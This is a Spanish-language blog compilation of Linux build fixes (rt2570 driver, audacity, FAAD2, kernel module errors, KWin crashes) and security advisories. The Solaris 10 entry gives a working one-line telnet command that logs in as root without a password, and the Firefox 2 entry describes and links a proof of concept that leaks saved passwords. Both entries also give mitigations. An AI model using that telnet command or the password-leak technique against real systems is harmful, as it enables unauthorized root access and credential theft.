Bug de seguridad en Sun Solaris 10 (Otras versiones pueden ser vulnerables) que permite a un atacante externo con acceso al servidor de telnet obtener privilegios de root fácilmente.

$ telnet -l "-froot" IP

También cualquier otro usuario mediante:

$ telnet -l "-fusuario" IP

No existe parche oficial. Se recomienda deshabilitar el acceso por telnet (puerto 23).

Fuente: http://blogs.securiteam.com/index.php/archives/814

Este es el driver que permite a las tarjetas con chip rt2570 poder inyectar tráfico de manera optima.

Instalar el driver ya sabemos: http://www.tuxhuellas.com/2006/01/07/linksys-wusb54g-wlan-usb-en-linux/

Vamos a ver como resolver el problema que da el make install a la hora de compilar.

Estamos en el directorio rt2570-cvs-20050826/Module/ y el make salio correctamente, veamos que pasa con el make install

[root]$ make install

if ! [ -f rt2570.o ]; then \
module; \
fi
install 'rt2570.o' to /lib/modules/2.4.31/extra
install -m 755 -o 0 -g 0 -d /lib/modules/2.4.31/extra
install -m 644 -o 0 -g 0 rt2570.o /lib/modules/2.4.31/extra
/sbin/depmod -a
depmod: /lib/modules/2.4.31/net/bpf.h is not an ELF file
make: *** [modules_install] Error 1

El depmod espera encontrar dos clases de archivos: módulos del núcleo (ELF files) o archivos de dependencia (archivo.dep)

En nuestro caso encontramos en /lib/modules/2.4.31/net/ el archivo bpf.h por lo que la solución esta en cambiar de sitio ese archivo durante el proceso de instalacion "make install".

[root]$ mv /lib/modules/2.4.31/net/bpf.h /home/busi

«/lib/modules/2.4.31/net/bpf.h» -> «/home/busi/bpf.h»

Pues ya esta arreglado el problema de "is not an ELF file"

[root]$ make install
if ! [ -f rt2570.o ]; then \
module; \
fi
install 'rt2570.o' to /lib/modules/2.4.31/extra
install -m 755 -o 0 -g 0 -d /lib/modules/2.4.31/extra
install -m 644 -o 0 -g 0 rt2570.o /lib/modules/2.4.31/extra
/sbin/depmod -a

[root]$

Ya está, ahora podemos colocar de nuevo el archivo donde debe estar:

[root]$ mv /home/busi/bpf.h /lib/modules/2.4.31/net/

«bpf.h» -> «/lib/modules/2.4.31/net/bpf.h»

Ya podemos insertar el módulo despues del make install y esta solución suele ser válida para otros casos en los que de error de "is not an ELF file".

Vamos a ver como resolver algunos problemillas a la hora de instalar compilando la aplicación audacity

Depencia necesarias:

Instalamos wxWidgets (X11):

Archivo: http://prdownloads.sourceforge.net/wxwindows/wxWidgets-2.6.3.tar.gz

$ tar -zxvf wxWidgets-2.6.3.tar.gz
$ mv wxWidgets-2.6.3 wx
$ cd wx
$ ./configure --with-x11
$ make
# make install
# ldconfig

Instalamos wxWidgets (GTK):

Archivo:http://prdownloads.sourceforge.net/wxwindows/wxGTK-2.6.3.tar.gz

$ tar -zxvf wxGTK-2.6.3.tar.gz
$ cd wxGTK-2.6.3
$ mkdir buildgtk
$ cd buildgtk
$ ../configure --with-gtk
$ make
# make install
# ldconfig

Comprobamos que se instalara bien todo.

$ wx-config --version
2.6.3

NOTA: Tiene que ser version 2.6, una inferior no valedria y daria error al compilar (el ./configure)

Leer más »

En principio es un bug que permite sacar la user y passwd que dejamos recordar a firefox. La version de Firefox 2 esta afectada y por lo visto versiones anteriores tambien por lo que he podido comprobar. Aun no hay solución del problema pero supongo en poco se pronunciaran con alguna nueva versión / actualización.

La causa de la vulnerabilidad es un error del administrador de contraseñas (Password Manager), el cual no hace la verificación apropiada de la URL antes de completar automáticamente los datos del usuario en los formularios de páginas Web. Podemos ver la prueba de concepto aquí o usar esta creada por mi, que en principio el código es más claro para entenderlo (Pero es casi lo mismo que el otro xploit):

pagina1.html: http://www.rootshell.be/~busindre/prueba1.html

pagina2.html: http://www.rootshell.be/~busindre/prueba2.html

NOTA: Es solo html, con que copies o bajes esos html podreis probarlo en local facilmente.

Insertemos los datos en pagina1.html, le damos a recordar contraseña. Cuando estemos en pagina2 le damos a la capa transparente esa que se mostrara y nos dirige a google. Pero si nos fijamos en la barra de direcciones, ahi encontramos nuestro logueo. Con internet explorer y demas navegadores como podreis comprobar no funciona este xploit. La medida que debemos tomar en cuanto a seguridad es no recordar passwords por ahora en firefox.

Encontrada vulnerabilidad en Sun Java JRE que puede ser aprovechada por atacantes para eludir ciertas restricciones de seguridad. La causa es un error no especificado en la librería Swing de Java Runtime Environment y podría permitir a un applet manipulado, acceder a datos en otros applets.

Versiones afectadas: JDK y JRE 5.0 (y 1.5.x) Update 7 y anterior, excepto la rama 1.3.1_xx y 1.4.2_xx.

Recomendamos actualizar a JDK y JRE 5.0 Update 8 o posterior desde http://www.java.com/en/download/manual.jsp

Un error muy típico de newbie a la hora de compilar aplicaciones es el no tener las versiones correctas de las herramientas para compilar (Compilador, kernel, sources y headers). Trataremos este error tan comun y generalmente de muy fácil arreglo:

Error comun:

# insmod: error inserting 'modulo.o': -1 Invalid module format (see the strace output of insmod below)

Típicas dos Causa:

1) Comprobar que tenemos la misma versión de kernel que de sources o headers:

Version Kernel: Linux 2.4.31
Version Sources: linux-2.4.31

Ejemplo en repositorios:

Kernel 2.4.27-2-386
kernel-headers-2.4.27-2
kernel-source-2.4.27

NOTA: Debemos buscar si usamos repositorios la versión idéntica, en ocaciones, como en el caso anterior vemos que el "-2" (Segunda modificación ) no se encuentra en las sources. Esto si estamos usando los repositorios oficiales deberiamos estar tranquilos de que funcione. Pero en algun caso se ha visto que por ese "-n" surgen problemas a la hora de insertar módulos. Que no ponga la arquitectura es menos importante, pero siempre recomendable. (Cuanto más idéntica sea la versión mejor)

2) Comprobar que estamos compilando con la misma versión del compilador (gcc) usado en la compilación del actual kernel. (En los precompilados podemos encontrar sorpresas y ver que está compilado con otra versión que no es la de nuestro actual gcc).

root@busipc:# cat /proc/version
Linux version 2.4.31 (root@tree) (gcc version 3.3.5) #6 Sun Jun 5 19:04:47 PDT 2005

root@busipc:# gcc -v
gcc versión 3.3.5

NOTA: Si esas dos soluciones no te funcionan, algo menos que tienes que mirar.

Es una íipica dependencia para compilar aplicaciones de video y temas de codificación audiovisual (MPEG4IP), Usado para plugins del WINlame,xmms, winamp,. veamos como se compila sin errores:

Descarga:FAAD2

Error al compilar:

Descomprimimos y dentro del directorio:

$ autoreconf -vif
$ ./configure --with-mp4v2
$ make

Makefile:623: *** falta un separador. Alto.

Solución:

Editamos el archivo Makefile (Busacmos la linea abajo)

rpm: Makefile
make dist
$(RPMBUILD) -ta $(PACKAGE)-$(VERSION).tar.gz
rm $(PACKAGE)-$(VERSION).tar.gz
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.

Y lo modificamos por:

rpm: Makefile make dist $(RPMBUILD) -ta $(PACKAGE)-$(VERSION).tar.gz rm $(PACKAGE)-$(VERSION).tar.gz
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.
.NOEXPORT:

NOTA: Todo en una linea.

Un vez modificado, repetimos el make y vemos que compila sin errores, luego un make install o checkinstall si queremos generar nuestro paquete y lo tendremos instalado.

Enlace relacionado: FAAC

FAAC, Freeware Advanced Audio Coder", Es un codificador MPEG2 and MPEG4 muy pedido en programa de audio y otros codificadores, decodificadores. Da muchos problemas si queremos compilarlo sin saber como. Contare dos formas de solucionar el problema de compilación de este paquete.

Paquete: FACC 1.25

Leer más »

Muy buena recopilación del famoso Blue Screen of Death o BSoD (Pantallazo azul de windows, el cual, indica que windows no ha podido recuperarse de un error.

KWin es la aplicación de KDE que gestiona las ventanas en este entorno gráfico. Desde la última rama de KDE, la 3.5, he notado que kwin peta con el mensaje de error "La aplicación KWin (kwin) ha fallado y ha causado la señal 11 (SIGSEGV)". En realidad pensaba que era problema mio, más que nada por lo toqueteado que tengo todo, pero hoy un mandrivero preguntó qué se podía hacer cuando petaba, ya que a él también le pasó (thx rtil25). Así que como potencialmente puede haber un bug que afecte muchos kderos, aquí va una solución sencilla y rápida. Antes de nada advertir que esto no pretende solucionar el bug, sino evitar tener que perder todo reseteando las X (control + alt + retroceso), y que no es la única alternativa.

A grandes rasgos lo que haremos será iniciar nuevamente a mano kwin, de manera que todo quede como estaba antes de la petada. Sin kwin no podemos abrir nuevas ventanas, así que no podremos ejecutarlo de ninguna manera en nuestra sesión, por eso lo que yo propongo es lo siguiente:

Abrid una nueva sesión X. Cuando kwin peta éste permite abrir el menú KDE, así que haremos lo siguiente:

Ahora debería aparecer kdm o posiblemente vuestro gestor de sesión. Nos logueamos con nuestro usuario y ya dentro abrimos una terminal. Una vez abierta, introducimos el siguiente código:

Ahora si vais a vuestra sesión X original, vereis que kwin ha reaparecido, así que ahora falta el último paso:

El --replace reemplaza el proceso kwin existente. Así que ya podremos volver a la sesión de X que abrimos antes y cerrarla.

Esto es todo, esperemos que los de KDE lo resuelvan pronto!

PD: en la última versión actual (3.5.2) también sucede, aunque en menor medida.

PD2: posiblemente no haga falta abrir una nueva sesión X y se pueda hacer desde cualquier tty. No lo he probado porque soy uno de los afectados por el driver de nVidia, que nos deja sin poder ver nuestras preciadas tty :(

PD3: una captura de la petada

y el texto con la depuración de salida del fallo.